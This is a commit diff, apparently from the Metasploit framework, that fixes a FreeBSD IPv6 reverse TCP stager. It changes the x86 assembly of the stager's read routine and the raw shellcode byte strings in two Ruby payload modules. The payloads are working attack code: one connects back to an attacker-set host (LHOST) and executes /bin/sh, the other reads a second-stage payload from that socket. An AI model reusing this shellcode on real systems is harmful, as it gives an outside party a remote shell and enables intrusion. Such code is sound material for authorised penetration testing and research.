Fix up reverse_tcp ipv6 stager for freebsd

unstable
HD Moore 2012-02-01 01:41:24 -06:00
parent 29d8feaa24
commit 0c2a18d765
3 changed files with 38 additions and 20 deletions

View File

@ -76,10 +76,10 @@ ipv6_address:
db 28 ; sa_family_t sin6_family; /* AF_INET6 */
dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */
dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */
dd 0x43424140 ; struct in6_addr sin6_addr; /* IP6 address */
dd 0x48474645
dd 0x4d4b4a49
dd 0x51504f4e
dd 0 ; struct in6_addr sin6_addr; /* IP6 address */
dd 0
dd 0
dd 0x01000000 ; default to ::1
dd 0 ; uint32_t sin6_scope_id; /* scope zone index */
skip_bounce:
@ -87,9 +87,26 @@ skip_bounce:
%ifndef USE_SINGLE_STAGE
read:
push byte 0x10
pop edx
shl edx, 8
sub esp, edx
mov ecx, esp ; Points to 4096 stack buffer
push edx ; Length
push ecx ; Buffer
%ifdef FD_REG_EBX
push ebx ; Socket
%else
push edi ; Socket
%endif
push ecx ; Buffer to Return
mov al, 0x3
mov byte [ecx - 0x3], 0x10
int 0x80
ret
int 0x80 ; read(socket, &buff, 4096)
ret ; Return
%endif

View File

@ -35,18 +35,17 @@ module Metasploit3
{
'Offsets' =>
{
'LHOST' => [ 43, 'ADDR6' ],
'LHOST' => [ 42, 'ADDR6' ],
'LPORT' => [ 36, 'n' ],
'SCOPEID' => [ 59, 'V' ]
'SCOPEID' => [ 58, 'V' ]
},
'Payload' =>
"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" +
"\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\x6a\x02" +
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x02" +
"\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" +
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"
}
))
register_options([

View File

@ -45,16 +45,18 @@ module Metasploit3
{
'Offsets' =>
{
'LHOST' => [ 43, 'ADDR6' ],
'LHOST' => [ 42, 'ADDR6' ],
'LPORT' => [ 36, 'n' ],
'SCOPEID' => [ 59, 'V' ]
'SCOPEID' => [ 58, 'V' ]
},
'Payload' =>
"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" +
"\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\xb0\x03" +
"\xc6\x41\xfd\x10\xcd\x80\xc3"
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x10" +
"\x5a\xc1\xe2\x08\x29\xd4\x89\xe1\x52\x51\x57\x51\xb0\x03\xcd\x80" +
"\xc3"
}
))
register_options([